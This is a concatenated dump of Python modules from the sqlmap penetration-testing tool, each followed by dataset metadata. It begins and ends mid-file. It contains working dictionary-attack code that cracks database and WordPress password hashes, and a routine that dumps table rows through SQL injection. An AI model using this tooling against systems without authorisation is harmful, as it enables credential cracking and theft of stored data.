current = __functions__[hash_regex](password=word, uppercase=False) count += 1 if current in hashes: for item in attack_info[:]: ((user, hash_), _) = item if hash_ == current: retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) attack_info.remove(item) elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0 or hash_regex == HASH.ORACLE_OLD or hash_regex == HASH.CRYPT_GENERIC and IS_WIN: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if not hasattr(conf, "api"): dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries except Exception, e: warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e) warnMsg += "Please report by e-mail to %s" % ML logger.critical(warnMsg) except KeyboardInterrupt: pass finally: if hasattr(proc_count, "value"): with proc_count.get_lock(): proc_count.value -= 1 def _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found, proc_id, proc_count, wordlists, custom_wordlist): count = 0 rotator = 0 wordlist = Wordlist(wordlists, proc_id, getattr(proc_count, "value", 0), custom_wordlist) try: for word in wordlist: if found.value: break current = __functions__[hash_regex](password=word, uppercase=False, **kwargs) count += 1 if not isinstance(word, basestring): continue if suffix: word = word + suffix try: if hash_ == current: if hash_regex == HASH.ORACLE_OLD: # only for cosmetic purposes word = word.upper() retVal.put((user, hash_, word)) clearConsoleLine() infoMsg = "\r[%s] [INFO] cracked password '%s'" % (time.strftime("%X"), word) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'\n" % user else: infoMsg += " for hash '%s'\n" % hash_ dataToStdout(infoMsg, True) found.value = True elif (proc_id == 0 or getattr(proc_count, "value", 0) == 1) and count % HASH_MOD_ITEM_DISPLAY == 0: rotator += 1 if rotator >= len(ROTATING_CHARS): rotator = 0 status = 'current status: %s... %s' % (word.ljust(5)[:5], ROTATING_CHARS[rotator]) if not user.startswith(DUMMY_USER_PREFIX): status += ' (user: %s)' % user if not hasattr(conf, "api"): dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status)) except KeyboardInterrupt: raise except (UnicodeEncodeError, UnicodeDecodeError): pass # ignore possible encoding problems caused by some words in custom dictionaries except Exception, e: warnMsg = "there was a problem while hashing entry: %s (%s). " % (repr(word), e) warnMsg += "Please report by e-mail to %s" % ML logger.critical(warnMsg) except KeyboardInterrupt: pass finally: if hasattr(proc_count, "value"): with proc_count.get_lock(): proc_count.value -= 1 def dictionaryAttack(attack_dict): suffix_list = [""] custom_wordlist = [] hash_regexes = [] results = [] resumes = [] processException = False user_hash = [] for (_, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ regex = hashRecognition(hash_) if regex and regex not in hash_regexes: hash_regexes.append(regex) infoMsg = "using hash method '%s'" % __functions__[regex].func_name logger.info(infoMsg) for hash_regex in hash_regexes: keys = set() attack_info = [] for (user, hashes) in attack_dict.items(): for hash_ in hashes: if not hash_: continue hash_ = hash_.split()[0] if hash_ and hash_.strip() else hash_ if re.match(hash_regex, hash_): item = None if hash_regex not in (HASH.CRYPT_GENERIC, HASH.WORDPRESS): hash_ = hash_.lower() if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): item = [(user, hash_), {}] elif hash_regex in (HASH.ORACLE_OLD, HASH.POSTGRES): item = [(user, hash_), {'username': user}] elif hash_regex in (HASH.ORACLE): item = [(user, hash_), {'salt': hash_[-20:]}] elif hash_regex in (HASH.MSSQL, HASH.MSSQL_OLD, HASH.MSSQL_NEW): item = [(user, hash_), {'salt': hash_[6:14]}] elif hash_regex in (HASH.CRYPT_GENERIC): item = [(user, hash_), {'salt': hash_[0:2]}] elif hash_regex in (HASH.WORDPRESS): item = [(user, hash_), {'salt': hash_[4:12], 'count': 1 << ITOA64.index(hash_[3]), 'prefix': hash_[:12]}] if item and hash_ not in keys: resumed = hashDBRetrieve(hash_) if not resumed: attack_info.append(item) user_hash.append(item[0]) else: infoMsg = "resuming password '%s' for hash '%s'" % (resumed, hash_) if user and not user.startswith(DUMMY_USER_PREFIX): infoMsg += " for user '%s'" % user logger.info(infoMsg) resumes.append((user, hash_, resumed)) keys.add(hash_) if not attack_info: continue if not kb.wordlists: while not kb.wordlists: # the slowest of all methods hence smaller default dict if hash_regex in (HASH.ORACLE_OLD, HASH.WORDPRESS): dictPaths = [paths.SMALL_DICT] else: dictPaths = [paths.WORDLIST] message = "what dictionary do you want to use?\n" message += "[1] default dictionary file '%s' (press Enter)\n" % dictPaths[0] message += "[2] custom dictionary file\n" message += "[3] file with list of dictionary files" choice = readInput(message, default="1") try: if choice == "2": message = "what's the custom dictionary's location?\n" dictPaths = [readInput(message)] logger.info("using custom dictionary") elif choice == "3": message = "what's the list file location?\n" listPath = readInput(message) checkFile(listPath) dictPaths = getFileItems(listPath) logger.info("using custom list of dictionaries") else: logger.info("using default dictionary") dictPaths = filter(None, dictPaths) for dictPath in dictPaths: checkFile(dictPath) kb.wordlists = dictPaths except SqlmapFilePathException, msg: warnMsg = "there was a problem while loading dictionaries" warnMsg += " ('%s')" % msg logger.critical(warnMsg) message = "do you want to use common password suffixes? (slow!) [y/N] " test = readInput(message, default="N") if test[0] in ("y", "Y"): suffix_list += COMMON_PASSWORD_SUFFIXES infoMsg = "starting dictionary-based cracking (%s)" % __functions__[hash_regex].func_name logger.info(infoMsg) for item in attack_info: ((user, _), _) = item if user and not user.startswith(DUMMY_USER_PREFIX): custom_wordlist.append(normalizeUnicode(user)) if hash_regex in (HASH.MYSQL, HASH.MYSQL_OLD, HASH.MD5_GENERIC, HASH.SHA1_GENERIC): for suffix in suffix_list: if not attack_info or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): p = _multiprocessing.Process(target=_bruteProcessVariantA, args=(attack_info, hash_regex, suffix, retVal, i, count, kb.wordlists, custom_wordlist)) processes.append(p) for p in processes: p.daemon = True p.start() while count.value > 0: time.sleep(0.5) else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) retVal = Queue() _bruteProcessVariantA(attack_info, hash_regex, suffix, retVal, 0, 1, kb.wordlists, custom_wordlist) except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except OSError: pass finally: if _multiprocessing: gc.enable() if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) attack_info = filter(lambda _: _[0][0] != user or _[0][1] != hash_, attack_info) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine() else: for ((user, hash_), kwargs) in attack_info: if processException: break if any(_[0] == user and _[1] == hash_ for _ in results): continue count = 0 found = False for suffix in suffix_list: if found or processException: break if suffix: clearConsoleLine() infoMsg = "using suffix '%s'" % suffix logger.info(infoMsg) retVal = None processes = [] try: if _multiprocessing: if _multiprocessing.cpu_count() > 1: infoMsg = "starting %d processes " % _multiprocessing.cpu_count() singleTimeLogMessage(infoMsg) gc.disable() retVal = _multiprocessing.Queue() found_ = _multiprocessing.Value('i', False) count = _multiprocessing.Value('i', _multiprocessing.cpu_count()) for i in xrange(_multiprocessing.cpu_count()): p = _multiprocessing.Process(target=_bruteProcessVariantB, args=(user, hash_, kwargs, hash_regex, suffix, retVal, found_, i, count, kb.wordlists, custom_wordlist)) processes.append(p) for p in processes: p.daemon = True p.start() while count.value > 0: time.sleep(0.5) found = found_.value != 0 else: warnMsg = "multiprocessing hash cracking is currently " warnMsg += "not supported on this platform" singleTimeWarnMessage(warnMsg) class Value(): pass retVal = Queue() found_ = Value() found_.value = False _bruteProcessVariantB(user, hash_, kwargs, hash_regex, suffix, retVal, found_, 0, 1, kb.wordlists, custom_wordlist) found = found_.value except KeyboardInterrupt: print processException = True warnMsg = "user aborted during dictionary-based attack phase (Ctrl+C was pressed)" logger.warn(warnMsg) for process in processes: try: process.terminate() process.join() except OSError: pass finally: if _multiprocessing: gc.enable() if retVal: conf.hashDB.beginTransaction() while not retVal.empty(): user, hash_, word = item = retVal.get(block=False) hashDBWrite(hash_, word) results.append(item) conf.hashDB.endTransaction() clearConsoleLine() results.extend(resumes) if len(hash_regexes) == 0: warnMsg = "unknown hash format. " warnMsg += "Please report by e-mail to %s" % ML logger.warn(warnMsg) if len(results) == 0: warnMsg = "no clear password(s) found" logger.warn(warnMsg) return results
34,478
Python
.py
716
34.198324
195
0.553875
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,980
crawler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/crawler.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import httplib import re import urlparse import time from lib.core.common import clearConsoleLine from lib.core.common import dataToStdout from lib.core.common import findPageForms from lib.core.common import singleTimeWarnMessage from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapConnectionException from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.threads import getCurrentThreadData from lib.core.threads import runThreads from lib.request.connect import Connect as Request from thirdparty.beautifulsoup.beautifulsoup import BeautifulSoup from thirdparty.oset.pyoset import oset def crawl(target): try: visited = set() threadData = getCurrentThreadData() threadData.shared.value = oset() def crawlThread(): threadData = getCurrentThreadData() while kb.threadContinue: with kb.locks.limit: if threadData.shared.unprocessed: current = threadData.shared.unprocessed.pop() if current in visited: continue else: visited.add(current) else: break content = None try: if current: content = Request.getPage(url=current, crawling=True, raise404=False)[0] except SqlmapConnectionException, e: errMsg = "connection exception detected (%s). skipping " % e errMsg += "URL '%s'" % current logger.critical(errMsg) except httplib.InvalidURL, e: errMsg = "invalid URL detected (%s). skipping " % e errMsg += "URL '%s'" % current logger.critical(errMsg) if not kb.threadContinue: break if isinstance(content, unicode): try: match = re.search(r"(?si)<html[^>]*>(.+)</html>", content) if match: content = "<html>%s</html>" % match.group(1) soup = BeautifulSoup(content) tags = soup('a') if not tags: tags = re.finditer(r'(?si)<a[^>]+href="(?P<href>[^>"]+)"', content) for tag in tags: href = tag.get("href") if hasattr(tag, "get") else tag.group("href") if href: if threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID: current = threadData.lastRedirectURL[1] url = urlparse.urljoin(current, href) # flag to know if we are dealing with the same target host _ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (url, target))) if conf.scope: if not re.search(conf.scope, url, re.I): continue elif not _: continue if url.split('.')[-1].lower() not in CRAWL_EXCLUDE_EXTENSIONS: with kb.locks.value: threadData.shared.deeper.add(url) if re.search(r"(.*?)\?(.+)", url): threadData.shared.value.add(url) except UnicodeEncodeError: # for non-HTML files pass finally: if conf.forms: findPageForms(content, current, False, True) if conf.verbose in (1, 2): threadData.shared.count += 1 status = '%d/%d links visited (%d%%)' % (threadData.shared.count, threadData.shared.length, round(100.0 * threadData.shared.count / threadData.shared.length)) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) threadData.shared.deeper = set() threadData.shared.unprocessed = set([target]) infoMsg = "starting crawler" if conf.bulkFile: infoMsg += " for target URL '%s'" % target logger.info(infoMsg) for i in xrange(conf.crawlDepth): threadData.shared.count = 0 threadData.shared.length = len(threadData.shared.unprocessed) numThreads = min(conf.threads, len(threadData.shared.unprocessed)) if not conf.bulkFile: logger.info("searching for links with depth %d" % (i + 1)) runThreads(numThreads, crawlThread, threadChoice=(i>0)) clearConsoleLine(True) if threadData.shared.deeper: threadData.shared.unprocessed = set(threadData.shared.deeper) else: break except KeyboardInterrupt: warnMsg = "user aborted during crawling. sqlmap " warnMsg += "will use partial list" logger.warn(warnMsg) finally: clearConsoleLine(True) if not threadData.shared.value: warnMsg = "no usable links found (with GET parameters)" logger.warn(warnMsg) else: for url in threadData.shared.value: kb.targets.add((url, None, None, None, None))
5,896
Python
.py
120
32.416667
178
0.527478
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,981
purge.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/purge.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import random import shutil import stat import string from lib.core.data import logger def purge(directory): """ Safely removes content from a given directory """ if not os.path.isdir(directory): warnMsg = "skipping purging of directory '%s' as it does not exist" % directory logger.warn(warnMsg) return infoMsg = "purging content of directory '%s'..." % directory logger.info(infoMsg) filepaths = [] dirpaths = [] for rootpath, directories, filenames in os.walk(directory): dirpaths.extend([os.path.abspath(os.path.join(rootpath, _)) for _ in directories]) filepaths.extend([os.path.abspath(os.path.join(rootpath, _)) for _ in filenames]) logger.debug("changing file attributes") for filepath in filepaths: try: os.chmod(filepath, stat.S_IREAD | stat.S_IWRITE) except: pass logger.debug("writing random data to files") for filepath in filepaths: try: filesize = os.path.getsize(filepath) with open(filepath, "w+b") as f: f.write("".join(chr(random.randint(0, 255)) for _ in xrange(filesize))) except: pass logger.debug("truncating files") for filepath in filepaths: try: with open(filepath, 'w') as f: pass except: pass logger.debug("renaming filenames to random values") for filepath in filepaths: try: os.rename(filepath, os.path.join(os.path.dirname(filepath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) except: pass dirpaths.sort(cmp=lambda x, y: y.count(os.path.sep) - x.count(os.path.sep)) logger.debug("renaming directory names to random values") for dirpath in dirpaths: try: os.rename(dirpath, os.path.join(os.path.dirname(dirpath), "".join(random.sample(string.ascii_letters, random.randint(4, 8))))) except: pass logger.debug("deleting the whole directory tree") os.chdir(os.path.join(directory, "..")) try: shutil.rmtree(directory) except OSError, ex: logger.error("problem occurred while removing directory '%s' ('%s')" % (directory, ex))
2,444
Python
.py
66
29.787879
140
0.641406
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,982
pivotdumptable.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/pivotdumptable.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import re from extra.safe2bin.safe2bin import safechardecode from lib.core.agent import agent from lib.core.bigarray import BigArray from lib.core.common import Backend from lib.core.common import isNoneValue from lib.core.common import isNumPosStrValue from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf from lib.core.data import logger from lib.core.data import queries from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED from lib.core.exception import SqlmapConnectionException from lib.core.exception import SqlmapNoneDataException from lib.core.settings import MAX_INT from lib.core.unescaper import unescaper from lib.request import inject def pivotDumpTable(table, colList, count=None, blind=True): lengths = {} entries = {} dumpNode = queries[Backend.getIdentifiedDbms()].dump_table.blind validColumnList = False validPivotValue = False if count is None: query = dumpNode.count % table query = whereQuery(query) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) if isinstance(count, basestring) and count.isdigit(): count = int(count) if count == 0: infoMsg = "table '%s' appears to be empty" % unsafeSQLIdentificatorNaming(table) logger.info(infoMsg) for column in colList: lengths[column] = len(column) entries[column] = [] return entries, lengths elif not isNumPosStrValue(count): return None for column in colList: lengths[column] = 0 entries[column] = BigArray() colList = filter(None, sorted(colList, key=lambda x: len(x) if x else MAX_INT)) if conf.pivotColumn: if any(re.search(r"(.+\.)?%s" % re.escape(conf.pivotColumn), _, re.I) for _ in colList): infoMsg = "using column '%s' as a pivot " % conf.pivotColumn infoMsg += "for retrieving row data" logger.info(infoMsg) validPivotValue = True colList.remove(conf.pivotColumn) colList.insert(0, conf.pivotColumn) else: warnMsg = "column '%s' not " % conf.pivotColumn warnMsg += "found in table '%s'" % table logger.warn(warnMsg) if not validPivotValue: for column in colList: infoMsg = "fetching number of distinct " infoMsg += "values for column '%s'" % column logger.info(infoMsg) query = dumpNode.count2 % (column, table) query = whereQuery(query) value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if isNumPosStrValue(value): validColumnList = True if value == count: infoMsg = "using column '%s' as a pivot " % column infoMsg += "for retrieving row data" logger.info(infoMsg) validPivotValue = True colList.remove(column) colList.insert(0, column) break if not validColumnList: errMsg = "all column name(s) provided are non-existent" raise SqlmapNoneDataException(errMsg) if not validPivotValue: warnMsg = "no proper pivot column provided (with unique values)." warnMsg += " It won't be possible to retrieve all rows" logger.warn(warnMsg) pivotValue = " " breakRetrieval = False try: for i in xrange(count): if breakRetrieval: break for column in colList: def _(pivotValue): if column == colList[0]: query = dumpNode.query.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, column), unescaper.escape(pivotValue, False)) else: query = dumpNode.query2.replace("'%s'", "%s") % (agent.preprocessField(table, column), table, agent.preprocessField(table, colList[0]), unescaper.escape(pivotValue, False)) query = whereQuery(query) return unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind)) value = _(pivotValue) if column == colList[0]: if isNoneValue(value): for pivotValue in filter(None, (" " if pivotValue == " " else None, "%s%s" % (pivotValue[0], unichr(ord(pivotValue[1]) + 1)) if len(pivotValue) > 1 else None, unichr(ord(pivotValue[0]) + 1))): value = _(pivotValue) if not isNoneValue(value): break if isNoneValue(value): breakRetrieval = True break pivotValue = safechardecode(value) if conf.limitStart or conf.limitStop: if conf.limitStart and (i + 1) < conf.limitStart: warnMsg = "skipping first %d pivot " % conf.limitStart warnMsg += "point values" singleTimeWarnMessage(warnMsg) break elif conf.limitStop and (i + 1) > conf.limitStop: breakRetrieval = True break value = "" if isNoneValue(value) else unArrayizeValue(value) lengths[column] = max(lengths[column], len(value) if value else 0) entries[column].append(value) except KeyboardInterrupt: warnMsg = "user aborted during enumeration. sqlmap " warnMsg += "will display partial output" logger.warn(warnMsg) except SqlmapConnectionException, e: errMsg = "connection exception detected. sqlmap " errMsg += "will display partial output" errMsg += "'%s'" % e logger.critical(errMsg) return entries, lengths def whereQuery(query): if conf.dumpWhere and query: prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "") if "%s)" % conf.tbl.upper() in prefix.upper(): prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix) elif re.search(r"(?i)\bWHERE\b", prefix): prefix += " AND %s" % conf.dumpWhere else: prefix += " WHERE %s" % conf.dumpWhere query = "%s ORDER BY %s" % (prefix, suffix) if suffix else prefix return query
7,075
Python
.py
145
37.289655
217
0.608475
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,983
deps.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/deps.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ from lib.core.data import logger from lib.core.dicts import DBMS_DICT from lib.core.enums import DBMS from lib.core.settings import IS_WIN def checkDependencies(): missing_libraries = set() for dbmsName, data in DBMS_DICT.items(): if data[1] is None: continue try: if dbmsName in (DBMS.MSSQL, DBMS.SYBASE): import _mssql import pymssql if not hasattr(pymssql, "__version__") or pymssql.__version__ < "1.0.2": warnMsg = "'%s' third-party library must be " % data[1] warnMsg += "version >= 1.0.2 to work properly. " warnMsg += "Download from %s" % data[2] logger.warn(warnMsg) elif dbmsName == DBMS.MYSQL: import pymysql elif dbmsName == DBMS.PGSQL: import psycopg2 elif dbmsName == DBMS.ORACLE: import cx_Oracle elif dbmsName == DBMS.SQLITE: import sqlite3 elif dbmsName == DBMS.ACCESS: import pyodbc elif dbmsName == DBMS.FIREBIRD: import kinterbasdb elif dbmsName == DBMS.DB2: import ibm_db_dbi elif dbmsName == DBMS.HSQLDB: import jaydebeapi import jpype except ImportError: warnMsg = "sqlmap requires '%s' third-party library " % data[1] warnMsg += "in order to directly connect to the database " warnMsg += "%s. Download from %s" % (dbmsName, data[2]) logger.warn(warnMsg) missing_libraries.add(data[1]) continue debugMsg = "'%s' third-party library is found" % data[1] logger.debug(debugMsg) try: import impacket debugMsg = "'python-impacket' third-party library is found" logger.debug(debugMsg) except ImportError: warnMsg = "sqlmap requires 'python-impacket' third-party library for " warnMsg += "out-of-band takeover feature. Download from " warnMsg += "http://code.google.com/p/impacket/" logger.warn(warnMsg) missing_libraries.add('python-impacket') try: import ntlm debugMsg = "'python-ntlm' third-party library is found" logger.debug(debugMsg) except ImportError: warnMsg = "sqlmap requires 'python-ntlm' third-party library for " warnMsg += "if you plan to attack a web application behind NTLM " warnMsg += "authentication. Download from http://code.google.com/p/python-ntlm/" logger.warn(warnMsg) missing_libraries.add('python-ntlm') if IS_WIN: try: import pyreadline debugMsg = "'python-pyreadline' third-party library is found" logger.debug(debugMsg) except ImportError: warnMsg = "sqlmap requires 'pyreadline' third-party library to " warnMsg += "be able to take advantage of the sqlmap TAB " warnMsg += "completion and history support features in the SQL " warnMsg += "shell and OS shell. Download from " warnMsg += "http://ipython.scipy.org/moin/PyReadline/Intro" logger.warn(warnMsg) missing_libraries.add('python-pyreadline') if len(missing_libraries) == 0: infoMsg = "all dependencies are installed" logger.info(infoMsg)
3,615
Python
.py
85
31.776471
88
0.595109
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,984
versioncheck.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/versioncheck.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import sys PYVERSION = sys.version.split()[0] if PYVERSION >= "3" or PYVERSION < "2.6": exit("[CRITICAL] incompatible Python version detected ('%s'). For successfully running sqlmap you'll have to use version 2.6 or 2.7 (visit 'http://www.python.org/download/')" % PYVERSION) extensions = ("gzip", "ssl", "sqlite3", "zlib") try: for _ in extensions: __import__(_) except ImportError: errMsg = "missing one or more core extensions (%s) " % (", ".join("'%s'" % _ for _ in extensions)) errMsg += "most probably because current version of Python has been " errMsg += "built without appropriate dev packages (e.g. 'libsqlite3-dev')" exit(errMsg)
820
Python
.py
18
42.555556
191
0.682957
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,985
htmlentities.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/htmlentities.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ # Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html htmlEntities = { 'quot': 34, 'amp': 38, 'lt': 60, 'gt': 62, 'nbsp': 160, 'iexcl': 161, 'cent': 162, 'pound': 163, 'curren': 164, 'yen': 165, 'brvbar': 166, 'sect': 167, 'uml': 168, 'copy': 169, 'ordf': 170, 'laquo': 171, 'not': 172, 'shy': 173, 'reg': 174, 'macr': 175, 'deg': 176, 'plusmn': 177, 'sup2': 178, 'sup3': 179, 'acute': 180, 'micro': 181, 'para': 182, 'middot': 183, 'cedil': 184, 'sup1': 185, 'ordm': 186, 'raquo': 187, 'frac14': 188, 'frac12': 189, 'frac34': 190, 'iquest': 191, 'Agrave': 192, 'Aacute': 193, 'Acirc': 194, 'Atilde': 195, 'Auml': 196, 'Aring': 197, 'AElig': 198, 'Ccedil': 199, 'Egrave': 200, 'Eacute': 201, 'Ecirc': 202, 'Euml': 203, 'Igrave': 204, 'Iacute': 205, 'Icirc': 206, 'Iuml': 207, 'ETH': 208, 'Ntilde': 209, 'Ograve': 210, 'Oacute': 211, 'Ocirc': 212, 'Otilde': 213, 'Ouml': 214, 'times': 215, 'Oslash': 216, 'Ugrave': 217, 'Uacute': 218, 'Ucirc': 219, 'Uuml': 220, 'Yacute': 221, 'THORN': 222, 'szlig': 223, 'agrave': 224, 'aacute': 225, 'acirc': 226, 'atilde': 227, 'auml': 228, 'aring': 229, 'aelig': 230, 'ccedil': 231, 'egrave': 232, 'eacute': 233, 'ecirc': 234, 'euml': 235, 'igrave': 236, 'iacute': 237, 'icirc': 238, 'iuml': 239, 'eth': 240, 'ntilde': 241, 'ograve': 242, 'oacute': 243, 'ocirc': 244, 'otilde': 245, 'ouml': 246, 'divide': 247, 'oslash': 248, 'ugrave': 249, 'uacute': 250, 'ucirc': 251, 'uuml': 252, 'yacute': 253, 'thorn': 254, 'yuml': 255, 'OElig': 338, 'oelig': 339, 'Scaron': 352, 'fnof': 402, 'scaron': 353, 'Yuml': 376, 'circ': 710, 'tilde': 732, 'Alpha': 913, 'Beta': 914, 'Gamma': 915, 'Delta': 916, 'Epsilon': 917, 'Zeta': 918, 'Eta': 919, 'Theta': 920, 'Iota': 921, 'Kappa': 922, 'Lambda': 923, 'Mu': 924, 'Nu': 925, 'Xi': 926, 'Omicron': 927, 'Pi': 928, 'Rho': 929, 'Sigma': 931, 'Tau': 932, 'Upsilon': 933, 'Phi': 934, 'Chi': 935, 'Psi': 936, 'Omega': 937, 'alpha': 945, 'beta': 946, 'gamma': 947, 'delta': 948, 'epsilon': 949, 'zeta': 950, 'eta': 951, 'theta': 952, 'iota': 953, 'kappa': 954, 'lambda': 955, 'mu': 956, 'nu': 957, 'xi': 958, 'omicron': 959, 'pi': 960, 'rho': 961, 'sigmaf': 962, 'sigma': 963, 'tau': 964, 'upsilon': 965, 'phi': 966, 'chi': 967, 'psi': 968, 'omega': 969, 'thetasym': 977, 'upsih': 978, 'piv': 982, 'bull': 8226, 'hellip': 8230, 'prime': 8242, 'Prime': 8243, 'oline': 8254, 'frasl': 8260, 'ensp': 8194, 'emsp': 8195, 'thinsp': 8201, 'zwnj': 8204, 'zwj': 8205, 'lrm': 8206, 'rlm': 8207, 'ndash': 8211, 'mdash': 8212, 'lsquo': 8216, 'rsquo': 8217, 'sbquo': 8218, 'ldquo': 8220, 'rdquo': 8221, 'bdquo': 8222, 'dagger': 8224, 'Dagger': 8225, 'permil': 8240, 'lsaquo': 8249, 'rsaquo': 8250, 'euro': 8364, 'weierp': 8472, 'image': 8465, 'real': 8476, 'trade': 8482, 'alefsym': 8501, 'larr': 8592, 'uarr': 8593, 'rarr': 8594, 'darr': 8595, 'harr': 8596, 'crarr': 8629, 'lArr': 8656, 'uArr': 8657, 'rArr': 8658, 'dArr': 8659, 'hArr': 8660, 'forall': 8704, 'part': 8706, 'exist': 8707, 'empty': 8709, 'nabla': 8711, 'isin': 8712, 'notin': 8713, 'ni': 8715, 'prod': 8719, 'sum': 8721, 'minus': 8722, 'lowast': 8727, 'radic': 8730, 'prop': 8733, 'infin': 8734, 'ang': 8736, 'and': 8743, 'or': 8744, 'cap': 8745, 'cup': 8746, 'int': 8747, 'there4': 8756, 'sim': 8764, 'cong': 8773, 'asymp': 8776, 'ne': 8800, 'equiv': 8801, 'le': 8804, 'ge': 8805, 'sub': 8834, 'sup': 8835, 'nsub': 8836, 'sube': 8838, 'supe': 8839, 'oplus': 8853, 'otimes': 8855, 'perp': 8869, 'sdot': 8901, 'lceil': 8968, 'rceil': 8969, 'lfloor': 8970, 'rfloor': 8971, 'lang': 9001, 'rang': 9002, 'loz': 9674, 'spades': 9824, 'clubs': 9827, 'hearts': 9829, 'diams': 9830, }
5,235
Python
.py
260
15.246154
78
0.439059
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,986
xrange.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/xrange.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ class xrange(object): """ Advanced (re)implementation of xrange (supports slice/copy/etc.) Reference: http://code.activestate.com/recipes/521885-a-pythonic-implementation-of-xrange/ >>> foobar = xrange(1, 10) >>> 7 in foobar True >>> 11 in foobar False >>> foobar[0] 1 """ __slots__ = ['_slice'] def __init__(self, *args): if args and isinstance(args[0], type(self)): self._slice = slice(args[0].start, args[0].stop, args[0].step) else: self._slice = slice(*args) if self._slice.stop is None: raise TypeError("xrange stop must not be None") @property def start(self): if self._slice.start is not None: return self._slice.start return 0 @property def stop(self): return self._slice.stop @property def step(self): if self._slice.step is not None: return self._slice.step return 1 def __hash__(self): return hash(self._slice) def __cmp__(self, other): return (cmp(type(self), type(other)) or cmp(self._slice, other._slice)) def __repr__(self): return 